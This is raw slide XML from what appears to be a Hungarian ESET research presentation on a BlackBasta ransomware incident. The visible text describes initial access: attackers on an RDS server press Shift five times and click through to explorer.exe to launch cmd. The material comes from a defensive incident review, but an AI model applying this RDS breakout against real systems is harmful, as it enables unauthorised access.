              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="143" idx="0"/>
              <a:endCxn id="141" idx="4"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="1334972" y="4424878"/>
              <a:ext cx="3900" cy="792506"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="25400" cap="rnd">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:alpha val="37325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E9BB8614-D4CB-1121-8F2F-7980163DBA00}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-93064" y="5217384"/>
              <a:ext cx="2856071" cy="477054"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom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hu-HU" sz="2500" dirty="0" smtClean="0">
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="100000">
                        <a:srgbClr val="C00000"/>
                      </a:gs>
                      <a:gs pos="57000">
                        <a:srgbClr val="FFB521"/>
                      </a:gs>
                      <a:gs pos="20000">
                        <a:srgbClr val="EA6D09"/>
                      </a:gs>
                    </a:gsLst>
                    <a:path path="circle">
                      <a:fillToRect l="100000" t="100000"/>
                    </a:path>
                  </a:gradFill>
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>Kezdeti hozzáférés</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2500" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="100000">
                      <a:srgbClr val="C00000"/>
                    </a:gs>
                    <a:gs pos="57000">
                      <a:srgbClr val="FFB521"/>
                    </a:gs>
                    <a:gs pos="20000">
                      <a:srgbClr val="EA6D09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endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Kép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54904" y="0"/>
            <a:ext cx="1533096" cy="39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33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FF145-CC81-1717-D229-3D96BB51E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299" y="876300"/>
            <a:ext cx="8829403" cy="1660525"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0"/>
              <a:t>Kezdeti hozzáférés</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- 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B930F-40B9-75BE-B0E3-A494D13C1C6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10885" y="7256268"/>
            <a:ext cx="8360228" cy="14256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3200" dirty="0" smtClean="0"/>
              <a:t>Címsor használata, hogy az </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>iexplorer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="3200" dirty="0" smtClean="0"/>
              <a:t>stb. futtatáshoz</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9" descr="A cartoon dog with hat&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2325E00C-5514-AEB6-FB10-91DCF2AE7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858" y="1336224"/>
            <a:ext cx="11421828" cy="7614552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2415" y="0"/>
            <a:ext cx="1565585" cy="407307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1110885" y="2505921"/>
            <a:ext cx="7824651" cy="1274195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marL="342900" lvl="0" indent="-342900" defTabSz="1371600">
              <a:lnSpc>
                <a:spcPct val="12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hu-HU" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Támadók bejelentkeznek az RDS szerverre és kiválasztanak egy alkalmazást</a:t>
            </a:r>
            <a:endParaRPr lang="hu-HU" sz="2500" dirty="0" smtClean="0">
              <a:latin typeface="+mj-lt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1123948" y="4057026"/>
            <a:ext cx="6283235" cy="64389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marL="342900" lvl="0" indent="-342900" defTabSz="1371600">
              <a:lnSpc>
                <a:spcPct val="12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hu-HU" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Shift billentyű megnyomása 5x</a:t>
            </a:r>
            <a:endParaRPr lang="hu-HU" sz="2500" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0A1823"/>
              </a:solidFill>
              <a:latin typeface="Calibri Bold"/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1123948" y="5068105"/>
            <a:ext cx="4990012" cy="68326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marL="342900" lvl="0" indent="-342900" defTabSz="1371600">
              <a:lnSpc>
                <a:spcPct val="12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hu-HU" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hivatkozáson kattintás</a:t>
            </a:r>
            <a:endParaRPr lang="hu-HU" sz="2500" dirty="0" smtClean="0">
              <a:latin typeface="+mj-lt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1123948" y="6113080"/>
            <a:ext cx="7106194" cy="683264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marL="342900" lvl="0" indent="-342900" defTabSz="1371600">
              <a:lnSpc>
                <a:spcPct val="12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hu-HU" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vezérlőpult</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>valójában</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>explorer.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="hu-HU" sz="25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7469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70B7F-080E-F37C-B96F-DB9CD574A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300" y="30043"/>
            <a:ext cx="16535400" cy="1431256"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Initial Access - RDS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="freerdp_RDS_Notepad_sticky">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D7BC29E-7542-E8A0-E2BB-C65BE03BA4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BF128D-8875-3A7A-AB5E-6CBACE81AF0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4775199" y="4532727"/>
            <a:ext cx="4847771" cy="1107996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l"/>
            <a:r>
              <a:rPr lang="en-US" sz="6600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>[SHIFT]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4AF008-D8EA-DB86-4D9F-3C50D2F9A74A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4775200" y="6672248"/>
            <a:ext cx="4847771" cy="1107996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l"/>
            <a:r>
              <a:rPr lang="en-US" sz="6600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>[SHIFT]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509F1-18F5-B5FF-9AE4-6C274F48FCBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7503885" y="5578288"/>
            <a:ext cx="4847771" cy="1107996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l"/>
            <a:r>
              <a:rPr lang="en-US" sz="6600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>[SHIFT]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B827AC-195E-AFB8-4A2C-01AFB25C3189}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9927770" y="4532727"/>
            <a:ext cx="4847771" cy="1107996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l"/>
            <a:r>
              <a:rPr lang="en-US" sz="6600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>[SHIFT]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FF3E48-4965-CAE9-84CF-7A929D8B7A7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9927770" y="6672248"/>
            <a:ext cx="4847771" cy="1107996"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="b">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="6600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>[SHIFT]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="374199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2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264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318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372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426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F146C-95D6-873D-3737-688A1284B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BF632-59C2-E738-33BF-10F12341FC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300" y="30043"/>
            <a:ext cx="16535400" cy="1431256"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Initial Access - RDS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="freerdp_RDS_Notepad_sticky_02">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5ED92917-3DED-4032-F2C2-E72FDF6CBF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1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B10FC-311C-A603-356B-8E14CC314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63CD6-15F1-71E2-7999-93B151889E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300" y="30043"/>
            <a:ext cx="16535400" cy="1431256"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Initial Access - RDS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="freerdp_RDS_Notepad_sticky_03">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EEF56CD-2399-108D-52B8-FF3D47A82A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7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SET Theme - Light">
  <a:themeElements>
    <a:clrScheme name="ESET">
      <a:dk1>
        <a:srgbClr val="0A1823"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="000000"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="F4F5F4"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="0096A1"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="FEAA3A"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="FE6142"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="D80B55"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="B19ADF"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="004B55"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="00717F"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="00BBC5"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="ESET">
      <a:majorFont>
        <a:latin typeface="Calibri Bold"/>
        <a:ea typeface=""/>
        <a:cs typeface=""/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Calibri"/>
        <a:ea typeface=""/>
        <a:cs typeface=""/>
      </a:minorFont>
    </a:fontScheme>
    <a:fmtScheme name="ESET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anchor="b"/>
      <a:lstStyle>
        <a:defPPr algn="l">
          <a:defRPr sz="2500" dirty="0" smtClean="0">
            <a:latin typeface="+mj-lt"/>
          </a:defRPr>
        </a:defPPr>
      </a:lstStyle>
    </a:txDef>
  </a:objectDefaults>
  <a:extraClrSchemeLst/>
  <a:custClrLst>
    <a:custClr name="ESET Mid Turquoise">
      <a:srgbClr val="0096A1"/>
    </a:custClr>
    <a:custClr name="ESET Heavy Turquoise">
      <a:srgbClr val="004B55"/>
    </a:custClr>
    <a:custClr name="ESET Dark Turquoise">
      <a:srgbClr val="00717F"/>
    </a:custClr>
    <a:custClr name="ESET Bright Turquoise">
      <a:srgbClr val="00BBC5"/>
    </a:custClr>
    <a:custClr name="ESET Light Turquoise">
      <a:srgbClr val="87CFD3"/>
    </a:custClr>
    <a:custClr name="ESET Black">
      <a:srgbClr val="000000"/>
    </a:custClr>
    <a:custClr name="ESET Dark">
      <a:srgbClr val="0A1823"/>
    </a:custClr>
    <a:custClr name="ESET Blue Grey">
      <a:srgbClr val="424D56"/>
    </a:custClr>
    <a:custClr name="ESET Mid Grey">
      <a:srgbClr val="949CA1"/>
    </a:custClr>
    <a:custClr name="ESET Sky Grey">
      <a:srgbClr val="BDD0D8"/>
    </a:custClr>
    <a:custClr name="ESET Concrete">
      <a:srgbClr val="DBDEDB"/>
    </a:custClr>
    <a:custClr name="ESET Light Concrete">
      <a:srgbClr val="F4F5F4"/>
    </a:custClr>
    <a:custClr name="ESET White">
      <a:srgbClr val="F4F5F4"/>
    </a:custClr>
    <a:custClr name="ESET Green">
      <a:srgbClr val="8DC63F"/>
    </a:custClr>
    <a:custClr name="ESET Green Light">
      <a:srgbClr val="BAE27A"/>
    </a:custClr>
    <a:custClr name="ESET Yellow">
      <a:srgbClr val="FEAA3A"/>
    </a:custClr>
    <a:custClr name="ESET Yellow Light">
      <a:srgbClr val="FCD080"/>
    </a:custClr>
    <a:custClr name="ESET Orange">
      <a:srgbClr val="FE6142"/>
    </a:custClr>
    <a:custClr name="ESET Orange Light">
      <a:srgbClr val="F7816D"/>
    </a:custClr>
    <a:custClr name="ESET Crimson">
      <a:srgbClr val="D80B55"/>
    </a:custClr>
    <a:custClr name="ESET Crimson Light">
      <a:srgbClr val="EA6CB1"/>
    </a:custClr>
    <a:custClr name="ESET Purple">
      <a:srgbClr val="B19ADF"/>
    </a:custClr>
    <a:custClr name="ESET Purple Light">
      <a:srgbClr val="D5CAEF"/>
    </a:custClr>
    <a:custClr name="ESET Blue">
      <a:srgbClr val="00C0F2"/>
    </a:custClr>
    <a:custClr name="ESET Blue Light">
      <a:srgbClr val="9FD5F1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ESET Theme - Light">
  <a:themeElements>
    <a:clrScheme name="ESET">
      <a:dk1>
        <a:srgbClr val="0A1823"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="000000"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="F4F5F4"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="0096A1"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="FEAA3A"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="FE6142"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="D80B55"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="B19ADF"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="004B55"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="00717F"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="00BBC5"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="ESET">
      <a:majorFont>
        <a:latin typeface="Calibri Bold"/>
        <a:ea typeface=""/>
        <a:cs typeface=""/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Calibri"/>
        <a:ea typeface=""/>
        <a:cs typeface=""/>
      </a:minorFont>
    </a:fontScheme>
    <a:fmtScheme name="ESET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anchor="b"/>
      <a:lstStyle>
        <a:defPPr algn="l">
          <a:defRPr sz="2500" dirty="0" smtClean="0">
            <a:latin typeface="+mj-lt"/>
          </a:defRPr>
        </a:defPPr>
      </a:lstStyle>
    </a:txDef>
  </a:objectDefaults>
  <a:extraClrSchemeLst/>
  <a:custClrLst>
    <a:custClr name="ESET Mid Turquoise">
      <a:srgbClr val="0096A1"/>
    </a:custClr>
    <a:custClr name="ESET Heavy Turquoise">
      <a:srgbClr val="004B55"/>
    </a:custClr>
    <a:custClr name="ESET Dark Turquoise">
      <a:srgbClr val="00717F"/>
    </a:custClr>
    <a:custClr name="ESET Bright Turquoise">
      <a:srgbClr val="00BBC5"/>
    </a:custClr>
    <a:custClr name="ESET Light Turquoise">
      <a:srgbClr val="87CFD3"/>
    </a:custClr>
    <a:custClr name="ESET Black">
      <a:srgbClr val="000000"/>
    </a:custClr>
    <a:custClr name="ESET Dark">
      <a:srgbClr val="0A1823"/>
    </a:custClr>
    <a:custClr name="ESET Blue Grey">
      <a:srgbClr val="424D56"/>
    </a:custClr>
    <a:custClr name="ESET Mid Grey">
      <a:srgbClr val="949CA1"/>
    </a:custClr>
    <a:custClr name="ESET Sky Grey">
      <a:srgbClr val="BDD0D8"/>
    </a:custClr>
    <a:custClr name="ESET Concrete">
      <a:srgbClr val="DBDEDB"/>
    </a:custClr>
    <a:custClr name="ESET Light Concrete">
      <a:srgbClr val="F4F5F4"/>
    </a:custClr>
    <a:custClr name="ESET White">
      <a:srgbClr val="F4F5F4"/>
    </a:custClr>
    <a:custClr name="ESET Green">
      <a:srgbClr val="8DC63F"/>
    </a:custClr>
    <a:custClr name="ESET Green Light">
      <a:srgbClr val="BAE27A"/>
    </a:custClr>
    <a:custClr name="ESET Yellow">
      <a:srgbClr val="FEAA3A"/>
    </a:custClr>
    <a:custClr name="ESET Yellow Light">
      <a:srgbClr val="FCD080"/>
    </a:custClr>
    <a:custClr name="ESET Orange">
      <a:srgbClr val="FE6142"/>
    </a:custClr>
    <a:custClr name="ESET Orange Light">
      <a:srgbClr val="F7816D"/>
    </a:custClr>
    <a:custClr name="ESET Crimson">
      <a:srgbClr val="D80B55"/>
    </a:custClr>
    <a:custClr name="ESET Crimson Light">
      <a:srgbClr val="EA6CB1"/>
    </a:custClr>
    <a:custClr name="ESET Purple">
      <a:srgbClr val="B19ADF"/>
    </a:custClr>
    <a:custClr name="ESET Purple Light">
      <a:srgbClr val="D5CAEF"/>
    </a:custClr>
    <a:custClr name="ESET Blue">
      <a:srgbClr val="00C0F2"/>
    </a:custClr>
    <a:custClr name="ESET Blue Light">
      <a:srgbClr val="9FD5F1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SET Research Template">
  <a:themeElements>
    <a:clrScheme name="ESET Colors">
      <a:dk1>
        <a:srgbClr val="0A1823"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="000000"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="F4F5F4"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="0096A1"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="FEAA3A"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="FE6142"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="D80B55"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="B19ADF"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="004B55"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="00717F"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="00BBC5"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="ESET">
      <a:majorFont>
        <a:latin typeface="Aptos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wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
        <a:spAutoFit/>
      </a:bodyPr>
      <a:lstStyle>
        <a:defPPr algn="l">
          <a:defRPr sz="2400" dirty="0" smtClean="0">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:alpha val="25000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:defRPr>
        </a:defPPr>
      </a:lstStyle>
    </a:txDef>
  </a:objectDefaults>
  <a:extraClrSchemeLst/>
  <a:custClrLst>
    <a:custClr name="ESET Mid Turquoise">
      <a:srgbClr val="0096A1"/>
    </a:custClr>
    <a:custClr name="ESET Heavy Turquoise">
      <a:srgbClr val="004B55"/>
    </a:custClr>
    <a:custClr name="ESET Dark Turquoise">
      <a:srgbClr val="00717F"/>
    </a:custClr>
    <a:custClr name="ESET Bright Turquoise">
      <a:srgbClr val="00BBC5"/>
    </a:custClr>
    <a:custClr name="ESET Light Turquoise">
      <a:srgbClr val="87CFD3"/>
    </a:custClr>
    <a:custClr name="ESET Black">
      <a:srgbClr val="000000"/>
    </a:custClr>
    <a:custClr name="ESET Dark">
      <a:srgbClr val="0A1823"/>
    </a:custClr>
    <a:custClr name="ESET Blue Grey">
      <a:srgbClr val="424D56"/>
    </a:custClr>
    <a:custClr name="ESET Mid Grey">
      <a:srgbClr val="949CA1"/>
    </a:custClr>
    <a:custClr name="ESET Sky Grey">
      <a:srgbClr val="BDD0D8"/>
    </a:custClr>
    <a:custClr name="ESET Concrete">
      <a:srgbClr val="DBDEDB"/>
    </a:custClr>
    <a:custClr name="ESET Light Concrete">
      <a:srgbClr val="F4F5F4"/>
    </a:custClr>
    <a:custClr name="ESET White">
      <a:srgbClr val="F4F5F4"/>
    </a:custClr>
    <a:custClr name="ESET Green">
      <a:srgbClr val="8DC63F"/>
    </a:custClr>
    <a:custClr name="ESET Green Light">
      <a:srgbClr val="BAE27A"/>
    </a:custClr>
    <a:custClr name="ESET Yellow">
      <a:srgbClr val="FEAA3A"/>
    </a:custClr>
    <a:custClr name="ESET Yellow Light">
      <a:srgbClr val="FCD080"/>
    </a:custClr>
    <a:custClr name="ESET Orange">
      <a:srgbClr val="FE6142"/>
    </a:custClr>
    <a:custClr name="ESET Orange Light">
      <a:srgbClr val="F7816D"/>
    </a:custClr>
    <a:custClr name="ESET Crimson">
      <a:srgbClr val="D80B55"/>
    </a:custClr>
    <a:custClr name="ESET Crimson Light">
      <a:srgbClr val="EA6CB1"/>
    </a:custClr>
    <a:custClr name="ESET Purple">
      <a:srgbClr val="B19ADF"/>
    </a:custClr>
    <a:custClr name="ESET Purple Light">
      <a:srgbClr val="D5CAEF"/>
    </a:custClr>
    <a:custClr name="ESET Blue">
      <a:srgbClr val="00C0F2"/>
    </a:custClr>
    <a:custClr name="ESET Blue Light">
      <a:srgbClr val="9FD5F1"/>
    </a:custClr>
  </a:custClrLst>
  <a:extLst>
    <a:ext uri="{05A4C25C-085E-4340-85A3-A5531E510DB2}">
      <thm15:themeFamily xmlns:thm15="http://schemas.microsoft.com/office/thememl/2012/main" name="ESET Research Template" id="{E3E4919E-863F-460A-A55A-B4F2A7191C55}" vid="{072AF8D0-F654-4BA4-A3BB-4A431F0F6F2C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964</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Egyéni</PresentationFormat>
  <Paragraphs>286</Paragraphs>
  <Slides>33</Slides>
  <Notes>11</Notes>
  <HiddenSlides>0</HiddenSlides>
  <MMClips>4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3</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>Diacímek</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>33</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="45" baseType="lpstr">
      <vt:lpstr>Aptos</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Bold</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Chiller</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Microsoft GothicNeo</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>ESET Theme - Light</vt:lpstr>
      <vt:lpstr>1_ESET Theme - Light</vt:lpstr>
      <vt:lpstr>ESET Research Template</vt:lpstr>
      <vt:lpstr>PowerPoint-bemutató</vt:lpstr>
      <vt:lpstr>BlackBasta – Oh Shi(f)t, mit tettek?</vt:lpstr>
      <vt:lpstr>A végzet idővonala</vt:lpstr>
      <vt:lpstr>A végzet idővonala</vt:lpstr>
      <vt:lpstr>A végzet idővonala</vt:lpstr>
      <vt:lpstr>Kezdeti hozzáférés - RDS</vt:lpstr>
      <vt:lpstr>Initial Access - RDS</vt:lpstr>
      <vt:lpstr>Initial Access - RDS</vt:lpstr>
      <vt:lpstr>Initial Access - RDS</vt:lpstr>
      <vt:lpstr>PowerPoint-bemutató</vt:lpstr>
      <vt:lpstr>PowerPoint-bemutató</vt:lpstr>
      <vt:lpstr>PowerPoint-bemutató</vt:lpstr>
      <vt:lpstr>PowerPoint-bemutató</vt:lpstr>
      <vt:lpstr>PowerPoint-bemutató</vt:lpstr>
      <vt:lpstr>Megszerezték a hozzáférést… Mit csináltak?</vt:lpstr>
      <vt:lpstr>Számos akciót blokkoltunk a 2 nap alatt</vt:lpstr>
      <vt:lpstr>Ha minden eszközüket blokkoltuk, akkor hogy futhatott le a zsarolókártevő?</vt:lpstr>
      <vt:lpstr>Initial Access - RDS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 végzet idővonala</vt:lpstr>
      <vt:lpstr>A végzet idővonala</vt:lpstr>
      <vt:lpstr>Final Lesson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2026-07-13T11:13:32Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-13T11:17:50Z</dcterms:modified>
</cp:coreProperties>
</file>